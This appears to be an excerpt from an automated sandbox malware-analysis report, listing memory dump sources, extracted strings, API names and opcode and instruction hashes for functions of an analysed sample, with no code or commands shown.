                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: =$^\
                                                                                                    • API String ID: 0-3808277151
                                                                                                    • Opcode ID: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
                                                                                                    • Instruction ID: 654ce685d1de04c166fba28492aced4140c285b3659d0307d14ebb6f0ec0fa1e
                                                                                                    • Opcode Fuzzy Hash: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
                                                                                                    • Instruction Fuzzy Hash: E0B1E4756083818FC729DF24C890BABBBE2EFC5315F08892CD4D68B781E7788845DB56
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *$*
                                                                                                    • API String ID: 0-899546507
                                                                                                    • Opcode ID: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
                                                                                                    • Instruction ID: 85e828159404ea38140b2b6e3eae779eeae70cb711d0c962846ff8a24547a3e5
                                                                                                    • Opcode Fuzzy Hash: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
                                                                                                    • Instruction Fuzzy Hash: F85190766083558FD718CF64D45435FBBE1EBC4308F058D2DE9EA9B281DBB899098BC2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: XY
                                                                                                    • API String ID: 0-554446067
                                                                                                    • Opcode ID: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                                                                    • Instruction ID: d641272ad35b4eeebbd9d600f92596cd8dd7c25af792fba6638ab3cd001d37ae
                                                                                                    • Opcode Fuzzy Hash: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                                                                    • Instruction Fuzzy Hash: 3D322F3AA18351CBC7149F28D91236BB7E1EF8A300F09D97ED4C997291E7B8C945C786
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: q
                                                                                                    • API String ID: 0-3900047139
                                                                                                    • Opcode ID: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                                                                    • Instruction ID: d2894ee3cd08ac16c3749e12b5b110520c9353356bc4cfd2bf9c021bc54d189f
                                                                                                    • Opcode Fuzzy Hash: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                                                                    • Instruction Fuzzy Hash: B522F1B4608311CBD714CF64D8A176BB7F1FF96318F48896DE8854B391E7788906CB8A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "PA
                                                                                                    • API String ID: 0-2145937358
                                                                                                    • Opcode ID: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                                                                    • Instruction ID: f624a7b71cbf7b314e20e1a45d24be04a38f24c047e10d0676dafeec8f7fc991
                                                                                                    • Opcode Fuzzy Hash: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                                                                    • Instruction Fuzzy Hash: 5CA102B15183118BD7189F28D8627ABB3E1EFD2314F09892EE8C58B390F77C9945C796
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                                                                    • Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
                                                                                                    • Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                                                                    • Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: d46930d8ea5d8e4c1fa930bb6d97d79fe89e2303350bbbf21d68262c0608e9e6
                                                                                                    • Instruction ID: 515d3a311094eac2f0ae36c51b03c82d462ce6005a22749a02a9cd3e8cb9e785
                                                                                                    • Opcode Fuzzy Hash: d46930d8ea5d8e4c1fa930bb6d97d79fe89e2303350bbbf21d68262c0608e9e6
                                                                                                    • Instruction Fuzzy Hash: EE31E4369583904BE7348F358C953EBBBE2ABC6314F198A6CC8D957285DB7A0805CB81
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                                                                    • Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
                                                                                                    • Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                                                                    • Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 1a694cecfd3be9603b07d6fb9acc2d21223d713bf2e364fe82ac352f710b0443
                                                                                                    • Instruction ID: 822734de72a375c273f97026b65f7d0f1ce55c71e2e7addbfb968dbdabc927a2
                                                                                                    • Opcode Fuzzy Hash: 1a694cecfd3be9603b07d6fb9acc2d21223d713bf2e364fe82ac352f710b0443
                                                                                                    • Instruction Fuzzy Hash: C231B4769583908BE3348F359C953DBBBE2BBC6314F19862CC8D957284DB7A0805CBC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Y\]R
                                                                                                    • API String ID: 2994545307-2023185185
                                                                                                    • Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                                                                    • Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
                                                                                                    • Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                                                                    • Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Y\]R
                                                                                                    • API String ID: 0-2023185185
                                                                                                    • Opcode ID: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
                                                                                                    • Instruction ID: 45aa47c4bc4aa4c909a7fd377fec4b7a62b01e86429b04a91fd5a179afc84bef
                                                                                                    • Opcode Fuzzy Hash: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
                                                                                                    • Instruction Fuzzy Hash: C691E1716483119BD319DF28D88076BB7E3EBC5314F188A3CE89997390DB759909CB82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x(m.
                                                                                                    • API String ID: 0-3038009362
                                                                                                    • Opcode ID: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                                                                    • Instruction ID: 8fe95d6803831fae5c575aca5061d2950839e556567635e7946eadf65fb6b687
                                                                                                    • Opcode Fuzzy Hash: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                                                                    • Instruction Fuzzy Hash: F27128B2A083108BD3248F25C4D03A7B7E1EFDA314F19595DE8C66B391E7788945C7D6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x(m.
                                                                                                    • API String ID: 0-3038009362
                                                                                                    • Opcode ID: 55679c1ab79aa0cc9e8bd8632c0c6d17a464fbc66da0cad8c1dcaab4c2fdadcb
                                                                                                    • Instruction ID: d69cb32c6e2806bc84e52d322b76f9dc150674d9188d8aa66bbc96802d677b59
                                                                                                    • Opcode Fuzzy Hash: 55679c1ab79aa0cc9e8bd8632c0c6d17a464fbc66da0cad8c1dcaab4c2fdadcb
                                                                                                    • Instruction Fuzzy Hash: AB7146B2A083508BD7258F24C8D076BB7E1FFD6318F185A1CE9C66B391E7758845CB82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: q
                                                                                                    • API String ID: 0-3900047139
                                                                                                    • Opcode ID: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
                                                                                                    • Instruction ID: bfd71d5ee42355939c062a028dadac58486c6c85aba871825f936092bfaa215d
                                                                                                    • Opcode Fuzzy Hash: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
                                                                                                    • Instruction Fuzzy Hash: AC5103B4604310CBD7209F24E85176B73E1FF85318F54456DE9898B3A1E739D92ACB8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (
                                                                                                    • API String ID: 0-3887548279
                                                                                                    • Opcode ID: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
                                                                                                    • Instruction ID: 2caae83b2d4013721f210141ccc417c30349dd5d0901d4fb7f3c841e3804c493
                                                                                                    • Opcode Fuzzy Hash: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
                                                                                                    • Instruction Fuzzy Hash: E851DE74109780DFDB209F24D859BABB7E5FF92314F09096DE4C98B2A1EB388514CB5B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: rA
                                                                                                    • API String ID: 0-3688822144
                                                                                                    • Opcode ID: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
                                                                                                    • Instruction ID: eea7f0b4564a115e112266a705f564882217ee49f10fc6db0b082ff3a9467cbb
                                                                                                    • Opcode Fuzzy Hash: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
                                                                                                    • Instruction Fuzzy Hash: 21410B3565C7824BD336CE7984903ABBBD2ABC6310F0C8A7D94D197785DE7CC8468752
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: q
                                                                                                    • API String ID: 0-3900047139
                                                                                                    • Opcode ID: 673c11ed654b93604eb6ab5b56a9e698777ccd58af881acd39c106462716c5a1
                                                                                                    • Instruction ID: 81511cb2e48865bc8bd8f50730c43ecf2a721ae123440c0a3839083b1f121e07
                                                                                                    • Opcode Fuzzy Hash: 673c11ed654b93604eb6ab5b56a9e698777ccd58af881acd39c106462716c5a1
                                                                                                    • Instruction Fuzzy Hash: F541DBB41483018BC760CF24C49176BB7F1FF86358F148A5CE9998BBA0E779950ADB87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "c_
                                                                                                    • API String ID: 0-1905016733
                                                                                                    • Opcode ID: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
                                                                                                    • Instruction ID: 139d9a56c6b22736b00f81c9c0a59650492495ee9bcb90bc8dd56261b9d87cf4
                                                                                                    • Opcode Fuzzy Hash: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
                                                                                                    • Instruction Fuzzy Hash: 7331F172E055018FC319CF2CC8623A6FBA2FB59308F19D12CC555A7796C7B9A80A8B84
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %
                                                                                                    • API String ID: 0-2567322570
                                                                                                    • Opcode ID: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
                                                                                                    • Instruction ID: fc55fbf2e67d6e55d69b8bdcc21a86b947583cb7b9fc2e15381c79fb32be4bbc
                                                                                                    • Opcode Fuzzy Hash: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
                                                                                                    • Instruction Fuzzy Hash: 492125315583508FD3248F24C854B6ABBE0EF9A318F084A5EE4D5EB392C379C945CB8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %
                                                                                                    • API String ID: 0-2567322570
                                                                                                    • Opcode ID: 4d24bd78338286888f8d211ca0a5dc873c79f3b924ede333e2a7dd3152c8cbc9
                                                                                                    • Instruction ID: 734a636b239f149c0ee7fe395fefbdca0d15c2261227c63d92691f36a2870a07
                                                                                                    • Opcode Fuzzy Hash: 4d24bd78338286888f8d211ca0a5dc873c79f3b924ede333e2a7dd3152c8cbc9
                                                                                                    • Instruction Fuzzy Hash: 142129315583508FD7198F24C854B2ABBE0AF4631CF494A5DE4E6EB3D1C379C945CB46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: UZW
                                                                                                    • API String ID: 0-4101217444
                                                                                                    • Opcode ID: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                                                    • Instruction ID: beb92d7dceb5f7ee2bc2359878695b6a9a5b74cab8484de6a3c22e177f9b20e4
                                                                                                    • Opcode Fuzzy Hash: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                                                    • Instruction Fuzzy Hash: 2D21E7706093618BD7209F65E89577FB7E1EF92308F44082EE5C187252EB7DC806CB5A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: UZW
                                                                                                    • API String ID: 0-4101217444
                                                                                                    • Opcode ID: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                                                    • Instruction ID: f24516a26cc38f357e03961b5b76abbc7a0f40534526b00934318b0c3393561d
                                                                                                    • Opcode Fuzzy Hash: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                                                    • Instruction Fuzzy Hash: 7B21D5B05083458BD7A09F64C8917FFB7E1EF92314F08882DE6C187A81E779C402DB12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #C}
                                                                                                    • API String ID: 0-275300757
                                                                                                    • Opcode ID: 54d830f3108b5f410fe416606f389226582127205c1caaec64cd793ee302cd76
                                                                                                    • Instruction ID: 361f77b7b42565d2b58049316392817889644841a60e8c435618560dc1588056
                                                                                                    • Opcode Fuzzy Hash: 54d830f3108b5f410fe416606f389226582127205c1caaec64cd793ee302cd76
                                                                                                    • Instruction Fuzzy Hash: 0A11CE764883058BD318DF19C4816ABFBE5BBE1304F14192DF1D687258CB71D3498B8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (
                                                                                                    • API String ID: 0-3887548279
                                                                                                    • Opcode ID: a77fa76463edf9bf5d8da47d9c40e08e56a16df71608e8171255b894610df72f
                                                                                                    • Instruction ID: cdbb2c07d9ac29b487fb0099e7f7503a61cddac5ae3de5585d31ed48a6c1505b
                                                                                                    • Opcode Fuzzy Hash: a77fa76463edf9bf5d8da47d9c40e08e56a16df71608e8171255b894610df72f
                                                                                                    • Instruction Fuzzy Hash: 351135B010D3808FE7329F24944DB9FBBE5BB92314F584D6CC4C99A255EB358019CB43
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b3a201b8e5456e04acd6c277bd4f9cc362c0339010213f8c812fce2c91a647e3
                                                                                                    • Instruction ID: 81516d2b71f578880f32ea2fb0b1a758f5866deba3e580c85c02b3815e78599f
                                                                                                    • Opcode Fuzzy Hash: b3a201b8e5456e04acd6c277bd4f9cc362c0339010213f8c812fce2c91a647e3
                                                                                                    • Instruction Fuzzy Hash: 92129432A0C7118BD725DF18D8806ABB3E1BFD4319F19893ED586A7381D738B8518B87
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b3a201b8e5456e04acd6c277bd4f9cc362c0339010213f8c812fce2c91a647e3
                                                                                                    • Instruction ID: 82017f98f3bc80d64f604053e1a15d337f5c2b05e2624617aa3b614377c8beef
                                                                                                    • Opcode Fuzzy Hash: b3a201b8e5456e04acd6c277bd4f9cc362c0339010213f8c812fce2c91a647e3
                                                                                                    • Instruction Fuzzy Hash: 3412D332A097118BC775DF18D8807ABF3E2FFC4319F198A2DD9869B290D734A811DB46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27528c4e1026f15c8b4d8e22d8fc954aa3de2470dcd330dc5e4b4ed7aeb3421c
                                                                                                    • Instruction ID: 94ada5613fcb5724ef714f3b33f4bba041d2705c14d30676149ca7069553ac03
                                                                                                    • Opcode Fuzzy Hash: 27528c4e1026f15c8b4d8e22d8fc954aa3de2470dcd330dc5e4b4ed7aeb3421c
                                                                                                    • Instruction Fuzzy Hash: 55C126B560D351CFD7048F24E85126BBBE1EF96304F18486EE4C597342DB39D906CB9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
                                                                                                    • Instruction ID: 5aabee4b8b26e2ec9a193049fa608abe716db33e51fa934c25155f6b19f8c581
                                                                                                    • Opcode Fuzzy Hash: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
                                                                                                    • Instruction Fuzzy Hash: AC9115316083018BEB14DF29D86072FB7E2FFC9724F15892DE9C597390D73898158B8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f9f340207ff99400aa1e8f7d0486ce8454284f6cb4ab257c27673f3fe4436c83
                                                                                                    • Instruction ID: 964dfe5d39f20398580d1b3bf9975c521aeab8927adc07eace9c9e6c2280738e
                                                                                                    • Opcode Fuzzy Hash: f9f340207ff99400aa1e8f7d0486ce8454284f6cb4ab257c27673f3fe4436c83
                                                                                                    • Instruction Fuzzy Hash: D69102316083818BD7149F19C850B2FB7E2FFC9728F158A7CE4D59B290D7359815CB86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1255f4a16ea10230f8237e4c05ad8c588ba4ba9d264dd35e923e8e3087f5a603
                                                                                                    • Instruction ID: 2111fa9e304b48309700938602874aac4406f1930da0b205156c5b471cdf0221
